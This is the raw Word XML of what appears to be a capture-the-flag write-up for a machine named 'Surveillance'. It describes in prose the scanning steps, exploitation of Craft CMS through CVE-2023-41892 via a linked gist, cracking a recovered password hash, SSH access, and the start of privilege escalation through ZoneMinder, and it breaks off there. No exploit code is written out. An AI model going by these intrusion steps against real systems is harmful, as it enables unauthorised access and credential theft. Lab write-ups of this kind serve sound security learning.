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D458" w14:textId="2EEEE985" w:rsidR="00203923" w:rsidRDefault="00203923" w:rsidP="00203923">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk157632472"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="008634F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">WRITE-UPS FOR </w:t>
      </w:r>
      <w:r w:rsidRPr="00203923">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Surveillance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008634F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="008634F4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>solve on 01/</w:t>
      </w:r>
      <w:r w:rsidR="00D559F8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="008634F4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED6CC12" w14:textId="03B68017" w:rsidR="00203923" w:rsidRDefault="00203923" w:rsidP="0020392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exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A0A2F" w14:textId="77777777" w:rsidR="00203923" w:rsidRDefault="00203923" w:rsidP="00203923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF0CFDA" w14:textId="54C47B1B" w:rsidR="00203923" w:rsidRPr="00203923" w:rsidRDefault="00203923" w:rsidP="0020392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Haloo</w:t>
      </w:r>
      <w:r w:rsidR="00BC5A5C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> every one, let’s start a day with </w:t>
      </w:r>
      <w:r w:rsidRPr="00332768">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Surveillance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Get our hand on some </w:t>
      </w:r>
      <w:r w:rsidRPr="00332768">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for exploitable ports. Add the domain to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00332768">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137CC17F" w14:textId="77777777" w:rsidR="00203923" w:rsidRDefault="00203923"/>
    <w:p w14:paraId="6CBE75F2" w14:textId="415FCE5E" w:rsidR="00E75A88" w:rsidRDefault="00E85DAF">
      <w:r w:rsidRPr="00E85DAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FD5DF3C" wp14:editId="5F4590A7">
            <wp:extent cx="5943600" cy="2700655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="13152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9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7EA" w14:textId="32DF5631" w:rsidR="00E85DAF" w:rsidRDefault="00E85DAF">
      <w:r w:rsidRPr="00E85DAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CFA6C32" wp14:editId="21509C7D">
            <wp:extent cx="5943600" cy="3058795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="86243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1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B42" w14:textId="77777777" w:rsidR="00753B51" w:rsidRDefault="00753B51"/>
    <w:p w14:paraId="5BA8632D" w14:textId="77777777" w:rsidR="00203923" w:rsidRDefault="00203923"/>
    <w:p w14:paraId="7F9BCFC5" w14:textId="3A92B919" w:rsidR="00203923" w:rsidRDefault="00203923">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Just start with a little bit </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and luckily, we find the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dir look suspicious!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BB885" w14:textId="65F192DB" w:rsidR="00753B51" w:rsidRDefault="00753B51">
      <w:r w:rsidRPr="00753B51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C64024A" wp14:editId="4AF0FE81">
            <wp:extent cx="5943600" cy="3073400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="136827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3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7BA4" w14:textId="77777777" w:rsidR="00B234A5" w:rsidRDefault="00B234A5"/>
    <w:p w14:paraId="3AB86920" w14:textId="66B334A9" w:rsidR="00203923" w:rsidRDefault="00203923">
      <w:r>
        <w:t>Try it on the web browser and it redirects us to the login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34745346" w14:textId="29D3BAF7" w:rsidR="00B234A5" w:rsidRDefault="00B234A5">
      <w:r w:rsidRPr="00B234A5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A3D11CA" wp14:editId="38D96058">
            <wp:extent cx="5943600" cy="3048635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6639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59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23E9" w14:textId="77777777" w:rsidR="00DC50A3" w:rsidRDefault="00DC50A3"/>
    <w:p w14:paraId="3A2BE688" w14:textId="77777777" w:rsidR="00A42146" w:rsidRDefault="00A42146"/>
    <w:p w14:paraId="12F9D587" w14:textId="77777777" w:rsidR="00A42146" w:rsidRDefault="00A42146"/>
    <w:p w14:paraId="20388BEF" w14:textId="4E66D7D2" w:rsidR="00A42146" w:rsidRDefault="00A42146">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Looking at the source code of the page, I found out the it uses </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Craft CMS 4.4.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F0011" w14:textId="15816626" w:rsidR="00DC50A3" w:rsidRDefault="00DC50A3">
      <w:r w:rsidRPr="00DC50A3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1300DA48" wp14:editId="23D7BC38">
            <wp:extent cx="5943600" cy="3074670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191842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5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BDD7" w14:textId="77777777" w:rsidR="00AD6502" w:rsidRDefault="00AD6502"/>
    <w:p w14:paraId="70EB9283" w14:textId="67F2D9D2" w:rsidR="00A42146" w:rsidRDefault="00A42146">
      <w:r>
        <w:t>Looking around the internet for a few minutes. I found this vulnerability useful. Just do as the instruction =)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404518A9" w14:textId="055B9D2B" w:rsidR="00AD6502" w:rsidRPr="003C2D9E" w:rsidRDefault="00AD6502">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2023-41892</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD2D11" w14:textId="626B7F95" w:rsidR="00AD6502" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="007002E1" w:rsidRPr="004313B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="267B5A51" w14:textId="6B148ABF" w:rsidR="007002E1" w:rsidRDefault="00A42146">
      <w:r>
        <w:t xml:space="preserve"> And now, the shell is in our hand&gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB16596" w14:textId="1AA455A2" w:rsidR="007002E1" w:rsidRDefault="007002E1">
      <w:r w:rsidRPr="007002E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D75D675" wp14:editId="6E747B4A">
            <wp:extent cx="5943600" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191290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6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E5A9" w14:textId="77777777" w:rsidR="001C62FC" w:rsidRDefault="001C62FC"/>
    <w:p w14:paraId="529CDFA1" w14:textId="22BA0D4A" w:rsidR="001C62FC" w:rsidRDefault="001C62FC">
      <w:r w:rsidRPr="001C62FC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="569C89F4" wp14:editId="4FBF9947">
            <wp:extent cx="5943600" cy="2976245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51899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2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3FB6" w14:textId="2F7C1401" w:rsidR="00A42146" w:rsidRDefault="00A42146">
      <w:r>
        <w:t xml:space="preserve">Just looking a little bit around the system. I found an </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.zip backup file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in storage directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CCDA04" w14:textId="77777777" w:rsidR="00A42146" w:rsidRDefault="00A42146"/>
    <w:p w14:paraId="29C4A9D3" w14:textId="77777777" w:rsidR="001C62FC" w:rsidRDefault="001C62FC"/>
    <w:p w14:paraId="2439FF7F" w14:textId="477981A7" w:rsidR="001C62FC" w:rsidRDefault="001C62FC">
      <w:r w:rsidRPr="001C62FC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B6FC082" wp14:editId="262EFA98">
            <wp:extent cx="5943600" cy="1142365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="166798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8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30EC" w14:textId="77777777" w:rsidR="003D21D1" w:rsidRDefault="003D21D1"/>
    <w:p w14:paraId="77DE9A8A" w14:textId="5675327B" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A">
      <w:r>
        <w:t>Naturally, I sent it to my local host and unzip to find if there is any valuable in4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BAC369" w14:textId="7464E6BE" w:rsidR="003D21D1" w:rsidRDefault="003D21D1">
      <w:r w:rsidRPr="003D21D1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DF50593" wp14:editId="51015922">
            <wp:extent cx="5943600" cy="402590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113597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5C29" w14:textId="77777777" w:rsidR="003D21D1" w:rsidRDefault="003D21D1"/>
    <w:p w14:paraId="0613CDAE" w14:textId="2B9C6815" w:rsidR="003D21D1" w:rsidRDefault="003D21D1">
      <w:r w:rsidRPr="003D21D1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A51AB4C" wp14:editId="431D1CED">
            <wp:extent cx="5943600" cy="287655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14629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4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A067" w14:textId="77777777" w:rsidR="000C1FCF" w:rsidRDefault="000C1FCF"/>
    <w:p w14:paraId="546EFE8F" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F74C648" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4985020A" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A59FBCA" w14:textId="2964275D" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">And hurray, there it is. Credential for </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Matthew</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user. A </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>password hash</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C4777" w14:textId="0EAC12CD" w:rsidR="000C1FCF" w:rsidRDefault="000C1FCF" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F7C1A5E" wp14:editId="7301181A">
            <wp:extent cx="5943600" cy="2785745"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163285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197C" w14:textId="77777777" w:rsidR="00364B42" w:rsidRDefault="00364B42" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773D4EA1" w14:textId="70361EE7" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let’s use hash-identifier to check which hash was used and it seems like the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SHA-256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388EDBF4" w14:textId="64631EE4" w:rsidR="00364B42" w:rsidRDefault="00364B42" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00364B42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4142A180" wp14:editId="1E816105">
            <wp:extent cx="5943600" cy="2559050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128698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0BD6" w14:textId="77777777" w:rsidR="00EA6132" w:rsidRDefault="00EA6132" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B282598" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E1A292" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C35F867" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5D2AA1" w14:textId="372D7B4D" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I used </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to crack it. In just a few seconds, I got the password for </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Matthew</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> guy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129C441" w14:textId="4D8765E7" w:rsidR="00EA6132" w:rsidRDefault="00EA6132" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA6132">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CC3381D" wp14:editId="2DD72B62">
            <wp:extent cx="5943600" cy="2144395"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="93732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5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F78E" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA14845" w14:textId="6122D653" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connect to the server as Matthew with ssh and </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">USER </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>FLAG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> !!!!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A698384" w14:textId="7F5CFEA0" w:rsidR="009D32FB" w:rsidRDefault="009D32FB" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="009D32FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E3282D0" wp14:editId="521E2872">
            <wp:extent cx="5943600" cy="2762885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211374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5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2C46" w14:textId="7E5ACA69" w:rsidR="0034186C" w:rsidRDefault="0034186C" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="0034186C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C1418E0" wp14:editId="659884B7">
            <wp:extent cx="5943600" cy="466090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191179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94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1DF" w14:textId="77777777" w:rsidR="00D603A8" w:rsidRDefault="00D603A8" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB211D7" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789A0039" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05945366" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7879EA86" w14:textId="77777777" w:rsidR="00FC625C" w:rsidRDefault="00FC625C" w:rsidP="00FC625C"/>
    <w:p w14:paraId="149A2493" w14:textId="23E861E5" w:rsidR="00FC625C" w:rsidRPr="00FC625C" w:rsidRDefault="00FC625C" w:rsidP="000C1FC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C625C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CE919" w14:textId="4566D22F" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A little bit attempts with the system but no luck came. At the end, I found that </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>zoneminder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not only a user’s name but also a name of a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6CE215" w14:textId="6CAC6735" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here I had the version </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1.36.32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I tried googling it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F835FA" w14:textId="265036A4" w:rsidR="00D603A8" w:rsidRDefault="00D603A8" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00D603A8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D74ECF1" wp14:editId="00AC15AF">
            <wp:extent cx="5943600" cy="873760"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="126548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2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9AC" w14:textId="77777777" w:rsidR="00A76E36" w:rsidRDefault="00A76E36" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5408DBAD" w14:textId="40A6B235" w:rsidR="00A76E36" w:rsidRDefault="00A76E36" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00A76E36">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="560F7F22" wp14:editId="02404ABE">
            <wp:extent cx="5943600" cy="3074035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3045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72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D603" w14:textId="77777777" w:rsidR="00480B9D" w:rsidRDefault="00480B9D" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5526FC" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4795E80F" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273F3A4E" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E233AF" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68191B5F" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6555C2C9" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A96432B" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB123A5" w14:textId="529400FE" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It seems like a web interface so I use </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PORT FORWARDING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in order to open on the browser in my local host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2BEBBD" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E2C912" w14:textId="32B1703F" w:rsidR="00480B9D" w:rsidRDefault="00480B9D" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00480B9D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093F062E" wp14:editId="2B4B244F">
            <wp:extent cx="5943600" cy="2659380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
